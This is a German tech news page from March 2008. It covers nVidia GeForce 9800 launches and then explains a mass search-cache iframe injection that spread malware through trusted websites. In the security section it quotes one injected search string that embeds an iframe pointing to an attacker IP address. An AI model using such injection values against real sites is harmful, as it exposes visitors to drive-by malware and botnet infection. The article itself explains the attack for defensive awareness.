14

News des 14. März 2008

In der zweiten Hälfte des März' wird nVidia einige weitere Grafikkarten der GeForce9-Serie vorstellen. So wird am 18. März (kommender Dienstag) die DualChip-Lösung GeForce 9800 GX2 gelauncht werden, die Karte wird auf zwei G92-Chips basieren und alle zweimal 128 Shader-Einheiten aktiviert haben. Als Taktfrequenzen sind aktuell 600/1500/1000 MHz im Gespräch, was in etwa auf dem Niveau der GeForce 8800 GTS (650/1625/970 MHz) wäre. Insofern ist eine Performance in Richtung einer SLI-Kombination aus zwei GeForce 8800 GTS Karten zu erwarten – wie genau das Verhältnis aussieht, wird man am Dienstag sehen können. Die GeForce 9800 GX2 Karten haben zudem extra SLI-Anschlüsse und sind somit auch für Quad-SLI geeignet, was nVidia mit diesen Karten wohl erstmals seit den GeForce 7900/7950 GX2 Karten wieder promoten dürfte.

Dafür scheint nVidia in der Tat einen Listenpreis von 599 Dollar anzusetzen, was beim derzeitigen Dollarkurs auf runde 500 Euro Straßenpreis hinauslaufen sollte. Dies erscheint aber immer noch ziemlich reichlich, denn eine einzelne GeForce 8800 GTS kostet zwar im Durchschnitt derzeit die Hälfte hiervon (250 Euro), bewegt sich aber schon stark in Richtung 220 oder gar 200 Euro. Hier bleibt abzuwarten, ob die Performance der GeForce 9800 GX2 dann wirklich auch zu deren Preis passt. Zumindest die Radeon HD 3870 X2 sollte aufgrund der technischen wie preislichen Ansetzung eigentlich klar ausgestochen werden – aber diese spielt ja auch in einem ganz anderen Marktsegment mit Preisen von derzeit 310 bis 340 Euro.

Weiterhin soll die GeForce 9800 GTX nunmehr am 25. März (übernächster Dienstag) erscheinen. Auch diese Karte basiert auf dem G92-Chip und bringt somit gegenüber den G92-basierenden SingleChip-Karten GeForce 8800 GT und GTS nur andere Taktfrequenzen mit sich, welche aktuell mit 675/1688/1100 MHz genannt werden. Wie schon festgestellt, fällt der Performance-Abstand zur GeForce 8800 GTS damit allerdings eher bescheiden aus. Allerdings braucht nVidia nach dem Auslaufen der GeForce 8800 Ultra ein neues Zugpferd für Triple-SLI, womit diese Karte dann wohl doch noch ihre Berechtigung finden wird. Derzeit ist noch kein Preis zur GeForce 9800 GTX bekannt, dieser ist jedoch kaum deutlich über dem vorgenannten Niveau der GeForce 8800 GTS zu erwarten.

Eine Berechtigung für die ebenfalls von einigen Quellen weiterhin gemeldete GeForce 9800 GTS ist hingegen schwer zu finden, denn mit deren Taktfrequenzen von 600/900 MHz liegt man exakt auf dem Niveau der GeForce 8800 GT – zudem gibt es im Umfeld letztgenannter Karte nun wirklich keinen Platz mehr für weitere G92-Varianten. Denkbar wäre nur die Lösung, dass nVidia die GeForce 8800 GT und GTS auslaufen lässt und dann die GeForce 9800 GTS den Platz der GeForce 8800 GT zu einem ähnlichen Preis einnimmt, während die GeForce 8800 GTS mehr oder weniger durch die (etwas schnellere) GeForce 9800 GTX ersetzt werden würde. Damit würde nVidia auch den Abstand zwischen diesen beiden Lösungen vergrößern, der bei der GeForce 8800 GT und GTS doch arg gering war und bei GeForce 9800 GTS zu GTX aufgrund der vorliegenden Taktraten dann doch wieder annehmbar wäre.

Der Heise Newsticker berichtet von massenweise gehackten Webseiten, welche Schadprogramme verbreiten. Angeblich seinen innerhalb einer Woche 200.000 Webseiten betroffen, wobei diese weniger aus den hinteren oder/und dunklen Ecken des Internets stammen sollen, sondern es sich vielmehr in der Masse um bekannte und respektierte Webseiten handelt soll. Leider haben sowohl Heise als auch andere Quellen arg an präziseren Erklärungen gespart, wie die Attacke nun genau abläuft – woraus man hätte vielleicht wertvolle Informationen ziehen können, wie man sich dagegen schützen kann. Demzufolge versuchen wir uns notgedrungen (und mit unseren deutlich beschränkteren Möglichkeiten) an einer Rekonstruktion des Falls.

Erstens einmal sind die Webseiten nicht direkt infiziert, die Sache ist deutlich komplizierter angelegt. Vielmehr machen sich die Hacker wieder einmal die Möglichkeit zunutze, dass viele Webseiten auch zusammen mit in die Webseite eingebetteten iFrames fremder URLs funktionieren – so dass man sich weiterhin auf der ursprünglich angewählten Seite befindet, in einem kleinen Bereich dieser Webseite aber Code von einer gänzlich fremden URL hat. Um so etwas zu erreichen, muss man normalerweise die entsprechende Webseite regelrecht hacken, was zumeist mühsame Handarbeit ist – nun wurde aber anscheinend eine einfachere Möglichkeit gefunden. Dabei macht man sich zunutze, dass die Suchfunktionen vieler Webseiten die getätigten Suchanfragen cachen und dieserart abspeichern, dass die Such-Robots von Google & Co. diese dann auch mit indizieren.

So weit ist das ganze erst einmal regulär und wohl auch so gedacht. Nicht gedacht hat man dabei allerdings an die Möglichkeit, dass Hacker auf bekannten Webseiten in großer Masse präparierte Suchanfragen abgeben. Diese enthalten erst einmal eine ganz reguläre Suchanfrage, zusätzlich wird direkt in der Suche aber der Link zu einem iFrame eingegeben, dass ganze sieht beispielsweise so aus: "myspace blog codes <IFRAME src="//195.225.178.21/5">". Als Suchanfrage ist das erst einmal ungefährlich, problematisch wird es ab der Suchergebnisanzeige-Seite: Denn diese enthält in ihrer URL üblicherweise die kompletten Suchbegriffe, darunter eben auch die iFrame-Anweisung – und leider führten die Browser diese dann aus, anstatt als es passive Eingabe zu werten. Das allein führt allerdings noch nicht zum Ziel, denn hiermit hat man nur einen Link, welche zu einem Suchergebnis zuzüglich einem präparierten iFrame führt.

Interessant wird es dadurch, dass man die Suchmaschinen großer Webseiten (welche zumeist auf Google basieren) mit massenweise solcherart Suchanfragen bombardiert werden und somit deren hohe Bewertung ausgenutzt wird, um die eigenen, präparierten Suchergebnisse nach oben zu puschen. All das funktioniert natürlich nur, weil die eigentliche Suchanfrage populäre Begriffe abfragt, ansonsten wäre eine hohe Plazierung in kurzer Zeit nicht möglich. Das bedeutet also nicht, dass das Google-Ratingsystem überlistet wurde – vielmehr haben sich die Hacker an das funktionierende Ratingsystem von Google perfekt drangehängt. Wenn nun ein Internetnutzer auf einer der befallenen Webseiten die Suchfunktion zu populären Begriffen nutzt, kann man schon mit den ersten Ergebnissen auf Links treffen, die zwar das Suchergebnis bringen, zusätzlich aber den präparierten iFrame anzeigen.

Wichtig ist hierbei, dass dieser iFrame dann in eine Webseite eingebettet ist, welche man zumeist als eher vertrauenswürdig betrachtet – nur daraus zieht dieser Fall seine Sprengkraft. Konkret sollen unter anderem ZDNet Asia, Namely, TV.com, News.com und MySimon betroffen sein (inzwischen noch viel mehr Webseiten) – würde man auf diesen Webseiten deren Suchfunktion benutzen, könnte es passieren, dass man zusätzlich zum regulären Suchergebnis auch jenen präparierten iFrame mitbekommt. Allerdings ist der präparierte iFrame oftmals für sich allein noch nicht gefährlich, vielmehr wird dieser derzeit vornehmlich dazu ausgenutzt, um angeblich fehlende Media-Codecs sowie angebliche Antiviren-Programme zum Download anzubieten. Lässt man sich allerdings darauf ein, wird der PC dann Teil eines Bot-Netzes, welches sich für weitere Angriffe benutzen lässt.

Allerdings gibt es wohl auch andere Infektionswege: So kann jener iFrame auch Schadcode für bekannte oder unbekannte Sicherheitslücken enthalten, wonach der PC danach genauso von den Hackern übernommen wird. Die Möglichkeiten sind hier leider unbegrenzt und man sollte sich nicht darauf verlassen, dass man einfach beim Ablehnen jeglicher Downloads ungeschoren davonkommt. Das tückische an diesem Angriff ist eben leider, dass dieser selbst auf einer absolut vertrauenswürdigen Webseite stattfinden kann – der Angriff selber ist faktisch schon gewöhnlich, allerdings wird die Vertrauenswürdigkeit bekannter Webseiten ausgenutzt. Demzufolge ist aber auch kein besonderer Schutz notwendig, da das Einbetten von Schadcode oder verseuchten Downloads in iFrames nun ja nichts neues sind.

Vielmehr ist der Internetnutzer schlicht dazu angehalten, sich gegenüber Schadcode mittels Betriebssystem-Updates und aktuellem Virenscanner abzusichern und gegenüber unvermittelt angebotenen Downloads Brain 1.0 einzusetzen – und dies nun eben auch auf vermeintlich vertrauenswürdigen Seiten und nicht nur in den hinteren Ecken des Webs. Natürlich kann man auch weitergehen und beispielsweise auf den sowieso rundherum anfälligeren Internet Explorer zugunsten anderer Browser verzichten, sowie im benutzten Browser sich mal intensiv mit den vorhandenen Sicherheitsstufen und -einstellungen beschäftigen – was aber wie gesagt nicht nur für diesen Fall interessant ist, sondern auch allgemein nützlich ist. Denn dieser konkrete Fall wird sicherlich schnell unterbunden werden, indem die betroffenen Webseiten das Einbetten von iFrames in die eigenen Suchergebnisse verhindern – aber die nächste große Attacke kommt nun einmal so sicher wie das Amen in der Kirche.